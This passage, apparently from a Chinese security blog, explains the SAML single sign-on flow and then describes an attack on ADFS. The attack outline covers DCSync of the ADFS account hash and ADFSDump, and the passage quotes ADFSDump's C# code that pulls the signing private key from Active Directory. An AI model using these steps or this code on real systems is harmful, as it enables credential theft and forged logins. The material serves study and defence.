0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">samlp:NameIDPolicy</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(0, 0, 204);">AllowCreate</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"true"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(0, 0, 204);">Format</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"urn:oasis:names:tc:SAML:2.0:nameid-format:transient"</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">/></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">  <span style="box-sizing: border-box;color: rgb(17, 119, 0);"></</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">samlp:AuthnRequest</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span></pre><p cid="n95" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">而返回的html from内容大概设这个样子的：它包含了上面的数据包作为其中一个hidden的值</span></p><pre spellcheck="false" lang="html" cid="n96" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">form</span> <span style="box-sizing: border-box;color: rgb(0, 0, 204);">method</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"post"</span> <span style="box-sizing: border-box;color: rgb(0, 0, 204);">action</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"<a href="https://idp.example.org/SAML2/SSO/POST" target="_blank">https://idp.example.org/SAML2/SSO/POST</a>"</span> <span style="box-sizing: border-box;color: rgb(0, 0, 204);">...</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">input</span> <span style="box-sizing: border-box;color: rgb(0, 0, 204);">type</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"hidden"</span> <span style="box-sizing: border-box;color: rgb(0, 0, 204);">name</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"SAMLRequest"</span> <span style="box-sizing: border-box;color: rgb(0, 0, 204);">value</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"<samlp:AuthnRequest>.......... </samlp:authnreques>"</span> <span style="box-sizing: border-box;color: rgb(17, 119, 0);">/></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    ... other input parameter....</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">input</span> <span style="box-sizing: border-box;color: rgb(0, 0, 204);">type</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"submit"</span> <span style="box-sizing: border-box;color: rgb(0, 0, 204);">value</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"Submit"</span> <span style="box-sizing: border-box;color: rgb(17, 119, 0);">/></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(17, 119, 0);"></</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">form</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">javascript</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">document.form[0].submit();// 后面紧跟一句类似这样的提交代码.</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(17, 119, 0);"></</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">javascript</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span></pre><ol class="list-paddingleft-1" start="3" cid="n97" mdtype="list" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n99" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">上面的form会被javascript自动提交到idp的某个地址。</span></p></li><li style="box-sizing: border-box;"><p cid="n101" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">idp也需要认证你， 于是返回给你一个认证的页面， 可能使用用户名密码认证，也可以使用ntlm认证等等一切可以认证你的方式。 因为idp保存有你的用户名和密码。</span></p></li><li style="box-sizing: border-box;"><p cid="n103" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">idp在认证你之后。觉得你合法， 于是就为你生成一些断言， 证明你是谁，你有什么权限等等。 并用自己的私钥签名。 然后包装成一个response格式，放在form里返回给你。</span></p></li></ol><pre spellcheck="false" lang="xml" cid="n104" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">samlp:Response</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">xmlns:samlp</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"urn:oasis:names:tc:SAML:2.0:protocol"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">xmlns:saml</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"urn:oasis:names:tc:SAML:2.0:assertion"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">ID</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"identifier_2"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">InResponseTo</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"identifier_1"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">Version</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"2.0"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">IssueInstant</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"2004-12-05T09:22:05"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(0, 0, 204);">Destination</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"<a href="https://sp.example.com/SAML2/SSO/POST" target="_blank">https://sp.example.com/SAML2/SSO/POST</a>"</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">saml:Issuer</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span><a href="https://idp.example.org/SAML2" target="_blank">https://idp.example.org/SAML2</a><span style="box-sizing: border-box;color: rgb(17, 119, 0);"></</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">saml:Issuer</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">samlp:Status</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">samlp:StatusCode</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">        <span style="box-sizing: border-box;color: rgb(0, 0, 204);">Value</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"urn:oasis:names:tc:SAML:2.0:status:Success"</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">/></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(17, 119, 0);"></</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">samlp:Status</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">saml:Assertion</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(0, 0, 204);">xmlns:saml</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"urn:oasis:names:tc:SAML:2.0:assertion"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(0, 0, 204);">ID</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"identifier_3"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(0, 0, 204);">Version</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"2.0"</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(0, 0, 204);">IssueInstant</span>=<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"2004-12-05T09:22:05"</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(17, 119, 0);"><</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">saml:Issuer</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span><a href="https://idp.example.org/SAML2" target="_blank">https://idp.example.org/SAML2</a><span style="box-sizing: border-box;color: rgb(17, 119, 0);"></</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">saml:Issuer</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">      <span style="box-sizing: border-box;color: rgb(170, 85, 0);"><!-- a POSTed assertion MUST be signed --></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">     ....................</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <span style="box-sizing: border-box;color: rgb(17, 119, 0);"></</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">saml:Assertion</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">  <span style="box-sizing: border-box;color: rgb(17, 119, 0);"></</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">samlp:Response</span><span style="box-sizing: border-box;color: rgb(17, 119, 0);">></span></span></pre><p cid="n105" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">正如上面第2步一样，它也会把response包装在一个form里面返回给你，并自动提交给 sp的某个地址</span></p><pre spellcheck="false" lang="" cid="n106" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">form method="post" action="<a href="https://sp.example.com/SAML2/SSO/POST" target="_blank">https://sp.example.com/SAML2/SSO/POST</a>" ...></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <input type="hidden" name="SAMLResponse" value="<samlp:Response>.........</samlp:respons>" /></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <input type="hidden" name="RelayState" value="''token''" /></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    ...</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">    <input type="submit" value="Submit" /></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">  </form></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"><javascript></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">document.form[0].submit();// 后面紧跟一句类似这样的提交代码.</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"></javascript></span></pre><ol class="list-paddingleft-1" start="7" cid="n107" mdtype="list" style="margin-top: 0.8em;margin-bottom: 0.8em;padding-left: 30px;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;white-space: normal;"><li style="box-sizing: border-box;"><p cid="n109" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">于是就到了第7步， 这个form被javascript自动提交到sp了。</span></p></li><li style="box-sizing: border-box;"><p cid="n111" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-bottom: 0.5rem;white-space: pre-wrap;"><span md-inline="plain" style="box-sizing: border-box;">sp读到form提交上来的 断言。 并通过idp的公钥验证了断言的签名。 于是信任了断言。 知道你是idp的合法用户了。 所以就最终给你返回了你最初请求的页面了。 </span><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="http://www.apc.com/resource1.aspx" target="_blank">http://www.apc.com/resource1.aspx</a></span><span md-inline="plain" style="box-sizing: border-box;">.</span></p></li></ol><p cid="n112" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">接下来明确一点，ADFS的身份信息数据不保存在ldap数据库中，而是WID（windows内置数据库）或远程 MS SQL 数据库中。所以我们需要ADFS服务账户的权限去进行访问</span></p><p cid="n113" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">一般而言是拿到域控后Dsync获取ADFS账号hash，然后使用ADFS账户权限调用ADFSDUMP脱取数据库</span></p><p cid="n114" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="plain" style="box-sizing: border-box;">从ADFSDUmp的源码我们可以看到，通过thumbnailphoto属性获取私钥</span></p><pre spellcheck="false" lang="c++" cid="n115" mdtype="fences" style="box-sizing: border-box;overflow: visible;font-family: var(--monospace);font-size: 0.9em;break-inside: avoid;text-align: left;white-space: normal;background-image: inherit;background-position: inherit;background-size: inherit;background-repeat: inherit;background-attachment: inherit;background-origin: inherit;background-clip: inherit;background-color: rgb(248, 248, 248);border-width: 1px;border-style: solid;border-color: rgb(231, 234, 237);border-radius: 3px;padding: 8px 4px 6px;margin-bottom: 15px;margin-top: 15px;width: inherit;"><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;"> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">public</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">static</span> <span style="box-sizing: border-box;color: rgb(0, 136, 85);">void</span> <span style="box-sizing: border-box;color: rgb(0, 0, 255);">GetPrivKey</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Dictionary</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);"><</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span>,<span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">></span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">arguments</span>)</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">        {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">domain</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">""</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">server</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">""</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">searchString</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">""</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span>(<span style="box-sizing: border-box;color: rgb(152, 26, 26);">!</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">arguments</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">ContainsKey</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"/domain"</span>))</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                <span style="box-sizing: border-box;color: rgb(170, 85, 0);">//no domain or server given, try to find it ourselves</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">domain</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">System</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">DirectoryServices</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">ActiveDirectory</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Domain</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">GetCurrentDomain</span>().<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Name</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">searchString</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"LDAP://"</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(119, 0, 136);">else</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                <span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">arguments</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">ContainsKey</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"/domain"</span>))</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                    <span style="box-sizing: border-box;color: rgb(0, 0, 0);">domain</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">arguments</span>[<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"/domain"</span>];</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                <span style="box-sizing: border-box;color: rgb(119, 0, 136);">if</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">arguments</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">ContainsKey</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"/server"</span>))</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                    <span style="box-sizing: border-box;color: rgb(0, 0, 0);">server</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">arguments</span>[<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"/server"</span>];</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                    <span style="box-sizing: border-box;color: rgb(0, 0, 0);">searchString</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Format</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"LDAP://{0}/"</span>, <span style="box-sizing: border-box;color: rgb(0, 0, 0);">server</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                } <span style="box-sizing: border-box;color: rgb(119, 0, 136);">else</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                    <span style="box-sizing: border-box;color: rgb(0, 0, 0);">searchString</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"LDAP://"</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">Console</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">WriteLine</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">"## Extracting Private Key from Active Directory Store"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">Console</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">WriteLine</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$</span><span style="box-sizing: border-box;color: rgb(170, 17, 17);">"[-] Domain is {domain}"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span>[] <span style="box-sizing: border-box;color: rgb(0, 0, 0);">domainParts</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">domain</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Split</span>(<span style="box-sizing: border-box;color: rgb(170, 17, 17);">'.'</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">List</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);"><</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">String</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">></span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">searchBase</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">new</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">List</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);"><</span><span style="box-sizing: border-box;color: rgb(0, 0, 0);">String</span><span style="box-sizing: border-box;color: rgb(152, 26, 26);">></span>{ <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"CN=ADFS"</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"CN=Microsoft"</span>, <span style="box-sizing: border-box;color: rgb(170, 17, 17);">"CN=Program Data"</span> };</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">foreach</span>( <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">part</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">in</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">domainParts</span>)</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                <span style="box-sizing: border-box;color: rgb(0, 0, 0);">searchBase</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Add</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">$</span><span style="box-sizing: border-box;color: rgb(170, 17, 17);">"DC={part}"</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            }</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(0, 0, 0);">string</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">ldap</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">$</span><span style="box-sizing: border-box;color: rgb(170, 17, 17);">"{searchString}{string.Join("</span>,<span style="box-sizing: border-box;color: rgb(170, 17, 17);">", searchBase.ToArray())}"</span>;</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            <span style="box-sizing: border-box;color: rgb(119, 0, 136);">try</span></span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">            {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                <span style="box-sizing: border-box;color: rgb(119, 0, 136);">using</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">DirectoryEntry</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">entry</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">new</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">DirectoryEntry</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">ldap</span>))</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                    <span style="box-sizing: border-box;color: rgb(119, 0, 136);">using</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">DirectorySearcher</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">mySearcher</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> <span style="box-sizing: border-box;color: rgb(119, 0, 136);">new</span> <span style="box-sizing: border-box;color: rgb(0, 0, 0);">DirectorySearcher</span>(<span style="box-sizing: border-box;color: rgb(0, 0, 0);">entry</span>))</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                    {</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                        <span style="box-sizing: border-box;color: rgb(0, 0, 0);">mySearcher</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 0);">Filter</span> <span style="box-sizing: border-box;color: rgb(152, 26, 26);">=</span> (<span style="box-sizing: border-box;color: rgb(0, 0, 0);">LdapFilter</span>);</span><span role="presentation" style="box-sizing: border-box;padding-right: 0.1px;">                        <span style="box-sizing: border-box;color: rgb(0, 0, 0);">mySearcher</span>.<span style="box-sizing: border-box;color: rgb(0, 0, 